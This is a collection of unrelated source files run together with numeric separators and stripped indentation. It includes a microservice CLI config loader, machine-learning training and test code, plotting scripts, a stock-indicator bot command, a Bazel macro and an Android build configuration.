client_options, _, cmd_opts = command.make_parser(ctx).parse_args(ctx.args)
for opt_key, opt_value in client_options.items():
cmd_opt = next(x for x in cmd_opts if x.name == opt_key)
client_options[opt_key] = cmd_opt.type(opt_value)
# Adds command and global options
options = {**command_options, **client_options, '_from_cws': True}
if options.get('help', False):
print(command.get_help(ctx))
return
command.make_context(command.name, options)
commands_to_be_executed.append(command, options)
# Executes all commands
for command_class, execution_list in commands_to_be_executed.items():
command_class.multi_execute(project_dir, workspace, execution_list)
except CwsClientError as client_err:
sys.stderr.write(f"Error in command: {client_err.msg}\n")
sys.exit(1)
except Exception as e:
sys.stderr.write(f"Error in command: {str(e)}\n")
sys.exit(1)
client.invoke = invoke
@dataclass
class CwsClientOptions:
"""Client options defined from click command."""
project_dir: str
workspace: str
module: str
service: str
config_file: str
config_file_suffix: str
def __init__(self, params):
self.project_dir = params.get('project_dir')
self.workspace = params.get('workspace')
self.module = params.get('module')
self.service = params.get('service')
self.config_file = params.get('config_file') or 'project'
self.config_file_suffix = params.get('config_file_suffix') or '.cws.yml'
self.project_config = ProjectConfig(self.project_dir, self.config_file, self.config_file_suffix)
@property
def services(self):
"""Returns the list of services defined from the client optons."""
if self.service:
return [(self.module, self.service)]
return self.project_config.all_services(self.module)
def get_handler(self, module, service):
"""Loads microservice handler."""
try:
return import_attr(module, service, cwd=self.project_dir)
except AttributeError as e:
raise CwsClientError(f"Module '{module}' has no microservice {service} : {str(e)}\n")
except ModuleNotFoundError as e:
raise CwsClientError(f"The module '{module}' is not defined in {self.project_dir} : {str(e)}\n")
except Exception as e:
raise CwsClientError(f"Error {e} when loading module '{module}'\n")
def get_service_config(self, module, service, workspace=None):
"""Returns the microserrvice's configuration."""
workspace = workspace or self.workspace
return ServiceConfig(self.project_config, module, service, workspace)
class ProjectConfig:
"""Class for the project configuration file."""
def __init__(self, project_dir, file_name, file_suffix):
self.project_dir = project_dir
self.params = {}
getLogger('anyconfig').setLevel(WARNING)
# Loads project configuration file at project dir then at root if not found
self.params = self._load_config(project_dir, file_name, file_suffix)
if not self.params:
self.params = self._load_config('.', file_name, file_suffix)
# Checks results
if not self.params:
raise CwsClientError(f"Cannot find project file ({file_name + file_suffix}).\n")
if self.params.get('version') != PROJECT_CONFIG_VERSION:
raise CwsClientError(f"Wrong project file version (should be {PROJECT_CONFIG_VERSION}).\n")
def get_service_config(self, module, service, workspace):
return ServiceConfig(self, module, service, workspace)
def all_services(self, module: str = None) -> List[Tuple[str, str]]:
""" Returns the list of (module, microservice) on which the command will be executed."""
services = self.params.get('services', {})
res = []
for s in services:
if 'module' not in s or 'services' not in s:
raise CwsClientError(f"Services wrongly defined.\n")
if module and s['module'] != module:
continue
if 'services' in s:
_module = s['module']
_services = s['services']
if type(_services) is str:
res.append((_module, _services))
else:
for service in _services:
res.append((_module, service))
return res
@property
def all_commands(self):
""" Returns the list of microservices on which the command will be executed."""
return self.params.get('commands', {})
@staticmethod
def _load_config(dir, file_name, file_suffix):
"""Loads the project configuration file."""
project_dir_path = Path(dir)
project_file = project_dir_path / (file_name + file_suffix)
project_secret_file = project_dir_path / (file_name + '.secret' + file_suffix)
return anyconfig.multi_load([project_file, project_secret_file], ac_ignore_missing=True)
@staticmethod
def _get_workspace_options(options, workspace):
"""Returns the option values defined for the specific workspace or globally."""
workspaces = options.pop('workspaces', {})
workspace_options = {k: v for x in workspaces if x.pop('workspace', None) == workspace
for k, v in x.items()}
return {**options, **workspace_options}
def _get_service_options(self, services, service, workspace):
"""Returns the option values defined for the specific service and workspace or globally."""
service_options = {}
for s in services:
if s.pop('service', None) == service:
s.pop('module', None)
service_options.update(self._get_workspace_options(s, workspace))
return {**service_options}
def get_module_options(self, options_list, module, service, workspace):
"""Returns the option values defined for the specific module, service and workspace or globally."""
if type(options_list) is not list:
options_list = [options_list]
service_options = {}
module_options = {}
for options in options_list:
if 'module' not in options or options.pop('module') == module:
services = options.pop('services', {})
module_options.update(self._get_workspace_options(options, workspace))
service_options.update(self._get_service_options(services, service, workspace))
return {**module_options, **service_options}
@dataclass
class ServiceConfig:
project_config: ProjectConfig
module: str
service: str
workspace: str
@property
def client_params(self):
res = asdict(self)
del res['project_config']
res['project_dir'] = self.project_config.project_dir
return res
def get_command(self, cmd_name, ms):
"""Get the command associated to this microservice."""
# Get command already added in handler
for name in ms.commands:
if name == cmd_name:
return ms.commands[name]
# Creates it from project class parameter if not already defined
cmd_class = self._command_class(cmd_name)
if cmd_class:
cmd = cmd_class(ms, name=cmd_name)
# Installs needed commands
for needed in cmd.needed_commands:
self.get_command(needed, ms)
return cmd
def _command_class(self, cmd_name):
"""Loads the command class defined by name."""
cmd_class_name = self.get_command_options(cmd_name).get('class')
if cmd_class_name:
splitted = cmd_class_name.split('.')
return import_attr('.'.join(splitted[:-1]), splitted[-1], cwd=self.project_config.project_dir)
def get_command_options(self, cmd_name):
options = deepcopy(self.project_config.all_commands.get(cmd_name, {}))
module_options = self.project_config.get_module_options(options, self.module, self.service, self.workspace)
return {**self.client_params, **module_options}
def main():
return client()
if __name__ == "__main__":
main()
|
64987
|
import gym.wrappers
from nn.mlp import MLP
import pickle
def test_cartpole(nn, file):
global observation
nn.load(file)
for _ in range(500):
env.render()
action = nn.forward(observation)
observation, reward, done, info = env.step(round(action.item()))
if done:
break
def save_model(nn, filename):
with open(filename, 'wb') as output:
pickle.dump(nn, output)
if __name__ == '__main__':
env = gym.make('CartPole-v1')
env.seed(123)
# env = gym.wrappers.Monitor(env, 'cartpole', video_callable=lambda episode_id: True, force=True)
observation = env.reset()
nn = MLP(4, 2, 1)
test_cartpole(nn, '../../../models/cartpole/cartpole12-27-2019_20-29_NN=MLPIndividual_POPSIZE=100_GEN'
'=20_PMUTATION_0.4_PCROSSOVER_0.9.npy')
# save_model(nn, "09-09-2019_17-37_POPSIZE=100_GEN=20_PMUTATION_0.4_PCROSSOVER_0.9.pkl")
env.close()
|
65014
|
import torch
import random
from tqdm import trange
from layers import Subgraph, Discriminator
from utils import GraphDatasetGenerator
import itertools
import json
from tqdm import tqdm
import numpy as np
import os
class Subgraph_Learning(object):
def __init__(self, args):
super(Subgraph_Learning, self).__init__()
self.args = args
self.dataset_generator = GraphDatasetGenerator(self.args.data)
self.batch_size = self.args.batch_size
self.train_percent = self.args.train_percent
self.valiate_percent = self.args.validate_percent
self.D_criterion = torch.nn.BCEWithLogitsLoss()
self.inner_loop = self.args.inner_loop
def _dataset_spilt(self):
Data_Length = len(self.dataset_generator.graphs)
Training_Length = int(self.train_percent * Data_Length)
Validate_Length = int(self.valiate_percent * Data_Length)
Testing_Length = Data_Length - Training_Length - Validate_Length
test_ind = [i for i in range(0, Testing_Length)]
all_ind = [j for j in range(0, Data_Length)]
train_val_ind = list(set(all_ind)-set(test_ind))
train_ind = train_val_ind[0:Training_Length]
validate_ind = train_val_ind[Training_Length:]
self.training_data = [self.dataset_generator.graphs[i] for i in train_ind]
self.valiate_data = [self.dataset_generator.graphs[i] for i in validate_ind]
self.testing_data = [self.dataset_generator.graphs[i] for i in test_ind]
def _setup_model(self):
self.model = Subgraph(self.args, self.dataset_generator.number_of_features)
self.discriminator = Discriminator(self.args)
if torch.cuda.is_available():
self.discriminator = Discriminator(self.args).cuda()
self.model = Subgraph(self.args, self.dataset_generator.number_of_features).cuda()
def set_requires_grad(self, net, requires_grad=False):
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
def fit_a_single_model(self):
self._dataset_spilt()
self._setup_model()
optimizer = torch.optim.Adam(self.model.parameters(),
lr=self.args.learning_rate,
weight_decay=self.args.weight_decay)
Data_Length = len(self.training_data)
Num_split = int(Data_Length / self.batch_size)
for _ in tqdm(range(self.args.epochs)):
for i in range(0, Num_split):
data = self.training_data[int(i*self.batch_size): min(int((i+1)*self.batch_size),Data_Length)]
embeddings, positive, negative, cls_loss, positive_penalty = self.model(data)
for j in range(0, self.inner_loop):
optimizer_local = torch.optim.Adam(self.discriminator.parameters(),
lr=self.args.learning_rate,
weight_decay=self.args.weight_decay)
optimizer_local.zero_grad()
local_loss = - self.MI_Est(self.discriminator, embeddings, positive)
local_loss.backward(retain_graph = True)
optimizer_local.step()
mi_loss = self.MI_Est(self.discriminator, embeddings, positive)
optimizer.zero_grad()
loss = cls_loss + positive_penalty + self.args.mi_weight * mi_loss
loss.backward()
optimizer.step()
print("Loss:%.2f"%(loss))
def MI_Est(self, discriminator, embeddings, positive):
shuffle_embeddings = embeddings[torch.randperm(self.batch_size)]
joint = discriminator(embeddings,positive)
margin = discriminator(shuffle_embeddings,positive)
mi_est = torch.mean(joint) - torch.log(torch.mean(torch.exp(margin)))
return mi_est
def return_index(self,data):
self.model.eval()
ind = self.model.assemble(data)
return ind
def validate(self):
ind = self.return_index(self.valiate_data)
count = 0
for data in ind:
save_path = os.path.join(self.args.save_validate, str(count) + '.json')
dump_data = json.dumps(data)
F = open(save_path, 'w')
F.write(dump_data)
F.close()
count += 1
def test(self):
ind = self.return_index(self.testing_data)
count = 0
for data in ind:
save_path = os.path.join(self.args.save_test, str(count) + '.json')
dump_data = json.dumps(data)
F = open(save_path, 'w')
F.write(dump_data)
F.close()
count += 1
def fit(self):
print("\nTraining started.\n")
self.fit_a_single_model()
|
65015
|
import numpy as np
from pyray.shapes.twod.paraboloid import *
from pyray.shapes.twod.functional import *
from pyray.rotation import *
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib as mpl
import os
basedir = '.\\Images\\RotatingCube\\'
if os.name == 'posix':
basedir = 'Images/RotatingCube/'
def draw_cubic():
fn = lambda x,y: x**3+y**3
for i in range(20):
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
r = general_rotation(np.array([1,0,0]),np.pi/120*i)
#drawFunctionalXYGridInCircle(draw, r, fn=fn, scale=10.0)
im.save(basedir + 'im' + str(i) + '.png')
def three_d_grid():
fig = plt.figure()
ax = fig.gca(projection='3d')
# Make data.
X = np.arange(-5, 5, 0.25)
Y = np.arange(-5, 5, 0.25)
X, Y = np.meshgrid(X, Y)
R = (X**3 + Y**3)
Z = R
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
# Customize the z axis.
#ax.set_zlim(-1.01, 1.01)
#ax.zaxis.set_major_locator(LinearLocator(10))
#ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
theta = np.linspace(0, 2 * np.pi, 100)
for r in np.arange(0.1,1.0,0.1):
#r = 1.0
x = r * np.sin(theta)
y = r * np.cos(theta)
z = x**3+y**3
ax.plot(x, y, z, label='parametric curve')
#ax.legend()
plt.show()
def paraboloid_w_grad(im_ind=0, scale=200, shift=np.array([1000,1000,0]), opacity=60,
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0 * (8 + im_ind/3.0))
j=4
r = rotation(3, 2 * np.pi* j /30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0 * (im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
render_scene_4d_axis(draw, r1, 4, scale, shift)
# This is what draws the pink paraboloid.
for z in np.arange(0.001, 3.5, 0.02):
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,
rgba=(255,20,147,50))
xax1=np.array([-100.0,0,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([100.0,0,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
xax1=np.array([0.0,-100,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([0.0,100,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
#gradients(draw,r)
pt = shift
draw.ellipse((pt[0]-10, pt[1]-10, pt[0]+10, pt[1]+10), fill = (0,255,0))
draw_paraboloid_plane(draw,r,3.3)
draw_paraboloid_plane(draw,r,2.0,extent=1.4)
draw_paraboloid_plane(draw,r,1.0,extent=1.0)
im.save(basepath + 'im' + str(im_ind) + '.png')
def gradients(draw,r):
#for z in [0.3,1.3,2.3,3.3]:
for z in [3.3,2.0,1.0]:
x = np.sqrt(z)
for x in np.arange(-x,x,x/2):
y = np.sqrt(z-x*x)
arrowV1(draw,r,np.array([y,x,z]), np.array([1.5*y,1.5*x,z]), (204,102,255))
if z>3.0:
arrowV1(draw,r,np.array([-y,x,z]), np.array([-1.5*y,1.5*x,z]), (204,102,255))
def draw_paraboloid_plane(draw,r,z=3.3,scale=200,shift=np.array([1000,1000,0]),extent=2):
pt1=np.array([extent,extent,z]);pt1=np.dot(r,pt1)*scale+shift
pt2=np.array([extent,-extent,z]);pt2=np.dot(r,pt2)*scale+shift
pt3=np.array([-extent,-extent,z]);pt3=np.dot(r,pt3)*scale+shift
pt4=np.array([-extent,extent,z]);pt4=np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,scale=scale,
rgba=(255,20,10,100),width=10)
def plane_w_arrows(im_ind=0, scale=200,\
shift=np.array([824,824,0]),\
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0*(8 + im_ind/3.0))
j=4
r = rotation(3, 2*np.pi*j/30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0*(im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (1648, 1648), "black")
draw = ImageDraw.Draw(im, 'RGBA')
pt1 = 3*np.array([1.0,-1.0,0]); pt2 = 3*np.array([1.0,1.0,0])
z = 1.2**2+1
pt3 = 3*np.array([-1.0,1.0,0]); pt4 = 3*np.array([-1.0,-1.0,0])
pt1 = np.dot(r,pt1)*scale+shift; pt2 = np.dot(r,pt2)*scale+shift
pt3 = np.dot(r,pt3)*scale+shift; pt4 = np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
draw_arrows(draw,r,rgba=(255,250,47),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0, rgba=(73,200,250),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0+np.pi/3, rgba=(255,20,147),shift=shift)
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,2.5]), shift=shift,rgb=(20,200,25))
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,-2.5]), shift=shift,rgb=(255,20,25))
im.save(basepath + 'im' + str(im_ind) + '.png')
def draw_arrows(draw,r,rot_angl=np.pi/6.0,rgba=(255,20,147),shift=np.array([1000,1000,0])):
base = np.array([0,0,1.5])
for theta in np.arange(0,np.pi*2,2*np.pi/3):
a = np.array([np.cos(theta),np.sin(theta),0])
rr = general_rotation(a, rot_angl)
arrow1 = np.dot(rr,base)
arrowV1(draw,r,np.array([0,0,0]), arrow1, rgb=rgba,shift=shift)
rgba = rgba+(150,)
generalized_arc(draw, r, center=np.array([0,0,1.5*np.cos(rot_angl)]),
vec=np.array([0,0,1]),
point=1.5*np.array([0,np.sin(rot_angl),np.cos(rot_angl)]),
radius=100, prcnt=1.0,
rgba=rgba,shift=shift)
#####################
## Paraboloid with Lagrange visualized.
im = Image.new("RGB", (2048, 2048), (1, 1, 1))
draw = ImageDraw.Draw(im, 'RGBA')
scale=5.0; ind=0; sep = 24; i = 2.0; base_coeff = 0.02; start_line = -12.0
shift = np.array([1000.0, 1000.0, 0.0])
r1 = np.eye(4); j=24
r = rotation(3, np.pi/30*j)
r1[:3,:3] = r
render_scene_4d_axis(draw, r1, 4)
fn = lambda x, y : paraboloid(x, y, coeff=i*base_coeff, intercept=i)
drawFunctionalXYGrid(draw, r, scale=scale, fn=fn,
extent=60, rgba2=(255,20,147,80),
saperatingPlane=np.array([-1,-1,sep]))
three_d_parabola(draw, r, r2)
im.save(basedir + 'im' + str(0) + '.png')
|
65025
|
import logging
import plotly.graph_objects as go
from bots import imps, load_candle
from openbb_terminal.common.technical_analysis import volume_model
from openbb_terminal.decorators import log_start_end
# pylint: disable=R0913
logger = logging.getLogger(__name__)
@log_start_end(log=logger)
def adosc_command(
ticker="",
interval: int = 15,
past_days: int = 0,
is_open: bool = False,
fast="3",
slow="10",
start="",
end="",
extended_hours: bool = False,
heikin_candles: bool = False,
trendline: bool = False,
news: bool = False,
):
"""Displays chart with chaikin oscillator [Yahoo Finance]"""
# Debug
if imps.DEBUG:
# pylint: disable=logging-too-many-args
logger.debug(
"ta adosc %s %s %s %s %s %s %s %s %s %s %s %s",
ticker,
interval,
past_days,
is_open,
fast,
slow,
start,
end,
extended_hours,
heikin_candles,
trendline,
news,
)
# Check for argument
if ticker == "":
raise Exception("Stock ticker is required")
if not fast.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
fast = int(fast)
if not slow.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
slow = int(slow)
# Retrieve Data
df_stock, start, end, bar_start = load_candle.stock_data(
ticker=ticker,
interval=interval,
past_days=past_days,
extended_hours=extended_hours,
start=start,
end=end,
heikin_candles=heikin_candles,
)
if df_stock.empty:
raise Exception("No Data Found")
df_ta = df_stock.loc[(df_stock.index >= start) & (df_stock.index < end)]
df_ta = df_ta.join(volume_model.adosc(df_stock, is_open, fast, slow))
# Output Data
if interval != 1440:
df_ta = df_ta.loc[(df_ta.index >= bar_start) & (df_ta.index < end)]
df_ta = df_ta.fillna(0.0)
plot = load_candle.candle_fig(
df_ta,
ticker,
interval,
extended_hours,
news,
bar=bar_start,
int_bar=interval,
trendline=trendline,
rows=2,
cols=1,
shared_xaxes=True,
vertical_spacing=0.05,
row_width=[0.4, 0.7],
specs=[
[{"secondary_y": True}],
[{"secondary_y": False}],
],
)
title = f"<b>{plot['plt_title']} AD Oscillator</b>"
fig = plot["fig"]
fig.add_trace(
go.Scatter(
name="AD Osc [M]",
mode="lines",
x=df_ta.index,
y=df_ta.iloc[:, 6].values
if (not trendline) and (interval != 1440)
else df_ta.iloc[:, 11].values,
line=dict(width=2),
opacity=1,
),
row=2,
col=1,
)
fig.update_layout(
margin=dict(l=0, r=0, t=50, b=20),
template=imps.PLT_TA_STYLE_TEMPLATE,
colorway=imps.PLT_TA_COLORWAY,
title=title,
title_x=0.1,
title_font_size=14,
dragmode="pan",
)
imagefile = "ta_adosc.png"
# Check if interactive settings are enabled
plt_link = ""
if imps.INTERACTIVE:
plt_link = imps.inter_chart(fig, imagefile, callback=False)
imagefile = imps.image_border(imagefile, fig=fig)
return {
"title": f"Stocks: Accumulation/Distribution Oscillator {ticker.upper()}",
"description": plt_link,
"imagefile": imagefile,
}
|
65047
|
load("//tools:defaults.bzl", "protractor_web_test_suite")
"""
Macro that can be used to define a e2e test in `modules/benchmarks`. Targets created through
this macro differentiate from a "benchmark_test" as they will run on CI and do not run
with `@angular/benchpress`.
"""
def e2e_test(name, server, **kwargs):
protractor_web_test_suite(
name = name,
on_prepare = "@npm//@angular/dev-infra-private/bazel/benchmark/component_benchmark:start-server.js",
server = server,
**kwargs
)
|
65076
|
from typing import Dict, Optional, Text, List
import apache_beam as beam
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import model_util
from tensorflow_model_analysis import types
from tensorflow_model_analysis.extractors import extractor
from tfx_bsl.tfxio import tensor_adapter
BATCHED_PREDICT_EXTRACTOR_STAGE_NAME = 'ExtractBatchPredictions'
def custom_extractors(eval_config,
eval_shared_model,
tensor_adapter_config
) -> List[tfma.extractors.Extractor]:
return tfma.default_extractors(
eval_config=eval_config,
eval_shared_model=eval_shared_model,
tensor_adapter_config=tensor_adapter_config,
custom_predict_extractor=BatchedPredictExtractor(eval_config,
eval_shared_model,
tensor_adapter_config
))
def BatchedPredictExtractor(
eval_config: config.EvalConfig,
eval_shared_model: types.MaybeMultipleEvalSharedModels,
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> extractor.Extractor:
eval_shared_models = model_util.verify_and_update_eval_shared_models(
eval_shared_model)
return extractor.Extractor(
stage_name=BATCHED_PREDICT_EXTRACTOR_STAGE_NAME,
ptransform=_ExtractBatchedPredictions(
eval_config=eval_config,
eval_shared_models={m.model_name: m for m in eval_shared_models},
tensor_adapter_config=tensor_adapter_config))
@beam.ptransform_fn
@beam.typehints.with_input_types(types.Extracts)
@beam.typehints.with_output_types(types.Extracts)
def _ExtractBatchedPredictions(
extracts: beam.pvalue.PCollection,
eval_config: config.EvalConfig,
eval_shared_models: Dict[Text, types.EvalSharedModel],
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> beam.pvalue.PCollection:
signature_names = {}
for spec in eval_config.model_specs:
model_name = '' if len(eval_config.model_specs) == 1 else spec.name
signature_names[model_name] = [spec.signature_name]
return (extracts
| 'Predict' >> beam.ParDo(
model_util.ModelSignaturesDoFn(
eval_config=eval_config,
eval_shared_models=eval_shared_models,
signature_names={
constants.PREDICTIONS_KEY: signature_names},
prefer_dict_outputs=True,
tensor_adapter_config=tensor_adapter_config)))
|
65107
|
from data.python_templates.items import item_templates
from data.python_templates.material import material_templates
from items.item import Item
class ItemFactory(object):
"""
At first this will only instantiate templates but eventually it should be able
to pump out variations of a template ex: Adjusted to match player level.
"""
def __init__(self):
self.template_instance_count = {}
def build(self, uid):
"""
Builds an item instance from a template using the uid.
:param uid: uid of the template to instantiate.
:return: Built instance from template.
"""
item_instance = item_templates[uid]
if item_instance:
return self._create_instance_of_template(item_instance)
else:
raise Exception("Could not find template for UID " + uid)
def _create_instance_of_template(self, item_template):
instance_id = 0
if item_template.uid in self.template_instance_count:
instance_id = self.template_instance_count[item_template.uid]
self.template_instance_count[item_template.uid] += 1
else:
self.template_instance_count[item_template.uid] = 1
instance_uid = item_template.uid + "_" + str(instance_id)
new_instance = Item(
uid=instance_uid,
name=item_template.name,
description=item_template.description,
display=item_template.display.copy(),
)
item_template.copy_to(new_instance)
return new_instance
def get_material_template_by_uid(self, uid):
return material_templates[uid]
def get_item_template_by_uid(self, uid):
return item_templates[uid]
|
65130
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .cond_bn import ConditionalBatchNorm1d
# adopted Generator ResBlock from https://arxiv.org/abs/1909.11646
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels, condition_dim):
super().__init__()
self.cond_bn = nn.ModuleList([
ConditionalBatchNorm1d(in_channels if i==0 else out_channels, condition_dim)
for i in range(4)])
self.leaky_relu = nn.LeakyReLU(0.2)
self.cnn = nn.ModuleList([
nn.Conv1d(in_channels if i==0 else out_channels, out_channels,
kernel_size=3, dilation=2**i, padding=2**i)
for i in range(4)])
self.shortcut = nn.Conv1d(in_channels, out_channels, kernel_size=1)
def forward(self, x, z, mask=None):
identity = x
x = self.cnn[0](self.leaky_relu(self.cond_bn[0](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[1](self.leaky_relu(self.cond_bn[1](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + self.shortcut(identity)
if mask is not None:
x.masked_fill_(mask, 0.0)
identity = x
x = self.cnn[2](self.leaky_relu(self.cond_bn[2](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[3](self.leaky_relu(self.cond_bn[3](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + identity
return x
class VCDecoder(nn.Module):
def __init__(self, hp):
super().__init__()
self.stem = nn.Conv1d(hp.chn.encoder + hp.chn.residual_out, hp.chn.gblock[0], kernel_size=7, padding=3)
self.gblock = nn.ModuleList([
GBlock(in_channels, out_channels, hp.chn.speaker.token)
for in_channels, out_channels in
zip(list(hp.chn.gblock)[:-1], hp.chn.gblock[1:])])
self.final = nn.Conv1d(hp.chn.gblock[-1], hp.audio.n_mel_channels, kernel_size=1)
def forward(self, x, speaker_emb, mask=None):
# x: linguistic features + pitch info.
# [B, chn.encoder + chn.residual_out, T_dec]
x = self.stem(x) # [B, chn.gblock[0], T]
if mask is not None:
x.masked_fill_(mask, 0.0)
for gblock in self.gblock:
x = gblock(x, speaker_emb, mask)
# x: [B, chn.gblock[-1], T]
x = self.final(x) # [B, M, T]
if mask is not None:
x.masked_fill_(mask, 0.0)
return x
|
65142
|
import torch
import unittest
import numpy as np
from torch.autograd import Variable
from losses.svm import SmoothTop1SVM, SmoothTopkSVM, MaxTop1SVM, MaxTopkSVM
from losses.functional import Topk_Smooth_SVM
from tests.utils import assert_all_close, V
from tests.py_ref import svm_topk_smooth_py_1, svm_topk_smooth_py_2,\
smooth_svm_py, max_svm_py, svm_topk_max_py
from torch.autograd.gradcheck import gradcheck
class TestMaxSVM(unittest.TestCase):
def setUp(self):
torch.manual_seed(1234)
np.random.seed(1234)
self.n_samples = 20
self.n_classes = 7
self.alpha = 1.
self.x = torch.randn(self.n_samples, self.n_classes)
self.y = torch.from_numpy(np.random.randint(0, self.n_classes,
size=self.n_samples))
self.k = 3
def testMaxSVM(self):
max_svm_th = MaxTop1SVM(self.n_classes, alpha=self.alpha)
res_th = max_svm_th(V(self.x), V(self.y))
res_py = max_svm_py(V(self.x), V(self.y), alpha=self.alpha)
assert_all_close(res_th, res_py)
def testMaxSVMtopk(self):
max_svm_th = MaxTopkSVM(self.n_classes, k=self.k)
res_th = max_svm_th(V(self.x), V(self.y))
res_py = svm_topk_max_py(V(self.x), V(self.y), k=self.k)
assert_all_close(res_th, res_py)
class TestSmoothSVM(unittest.TestCase):
def setUp(self):
torch.manual_seed(1234)
np.random.seed(1234)
self.n_samples = 20
self.n_classes = 7
self.tau = float(2.)
self.x = torch.randn(self.n_samples, self.n_classes)
self.y = torch.from_numpy(np.random.randint(0, self.n_classes,
size=self.n_samples))
def testSmoothSVM(self):
smooth_svm_th = SmoothTop1SVM(self.n_classes, tau=self.tau)
res_th = smooth_svm_th(V(self.x), V(self.y))
res_py = smooth_svm_py(V(self.x), V(self.y), self.tau)
assert_all_close(res_th, res_py)
class TestSmoothSVMTopk(unittest.TestCase):
def setUp(self):
torch.manual_seed(1234)
np.random.seed(1234)
self.n_samples = 2
self.n_classes = 7
self.k = 5
self.tau = float(2.)
self.x = torch.randn(self.n_samples, self.n_classes)
self.y = torch.from_numpy(np.random.randint(0, self.n_classes,
size=self.n_samples))
self.labels = torch.from_numpy(np.arange(self.n_classes))
def testSmoothSVMpy(self):
res_py_1 = svm_topk_smooth_py_1(V(self.x), V(self.y), self.tau, self.k)
res_py_2 = svm_topk_smooth_py_2(V(self.x), V(self.y), self.tau, self.k)
assert_all_close(res_py_1, res_py_2)
def testSmoothSVMth_functional(self):
F = Topk_Smooth_SVM(self.labels, self.k, self.tau)
res_th = F(V(self.x), V(self.y))
res_py = svm_topk_smooth_py_1(V(self.x), V(self.y), self.tau, self.k)
assert_all_close(res_th, res_py)
def testSmoothSVMth_loss(self):
svm_topk_smooth_th = SmoothTopkSVM(self.n_classes, tau=self.tau,
k=self.k)
res_th = svm_topk_smooth_th(V(self.x), V(self.y))
res_py = svm_topk_smooth_py_1(V(self.x),
V(self.y),
self.tau, self.k).mean()
assert_all_close(res_th, res_py)
def testSmoothSVMth_loss_scales(self):
svm_topk_smooth_th = SmoothTopkSVM(self.n_classes, tau=self.tau, k=self.k)
for scale in (1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 1e2, 1e3):
x = self.x * scale
res_th = svm_topk_smooth_th(V(x), V(self.y))
res_py = svm_topk_smooth_py_1(V(x), V(self.y), self.tau, self.k).mean()
assert_all_close(res_th, res_py)
def testGradSmoothSVMth_loss(self):
svm_topk_smooth_th = SmoothTopkSVM(self.n_classes, tau=self.tau, k=self.k)
for scale in (1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 1e2, 1e3, 1e4):
x = self.x * scale
x = Variable(x, requires_grad=True)
assert gradcheck(lambda x: svm_topk_smooth_th(x, V(self.y)),
(x,), atol=1e-2, rtol=1e-3, eps=max(1e-4 * scale, 1e-2)), \
"failed with scale {}".format(scale)
|
65146
|
import os
import sys
import platform
from distutils.version import LooseVersion
def is_active():
return True
def get_name():
return "Android"
def can_build():
return ("ANDROID_NDK_ROOT" in os.environ)
def get_platform(platform):
return int(platform.split("-")[1])
def get_opts():
from SCons.Variables import BoolVariable, EnumVariable
return [
('ANDROID_NDK_ROOT', 'Path to the Android NDK', os.environ.get("ANDROID_NDK_ROOT", 0)),
('ndk_platform', 'Target platform (android-<api>, e.g. "android-18")', "android-18"),
EnumVariable('android_arch', 'Target architecture', "armv7", ('armv7', 'armv6', 'arm64v8', 'x86', 'x86_64')),
BoolVariable('android_neon', 'Enable NEON support (armv7 only)', True),
]
def get_flags():
return [
('tools', False),
]
def create(env):
tools = env['TOOLS']
if "mingw" in tools:
tools.remove('mingw')
if "applelink" in tools:
tools.remove("applelink")
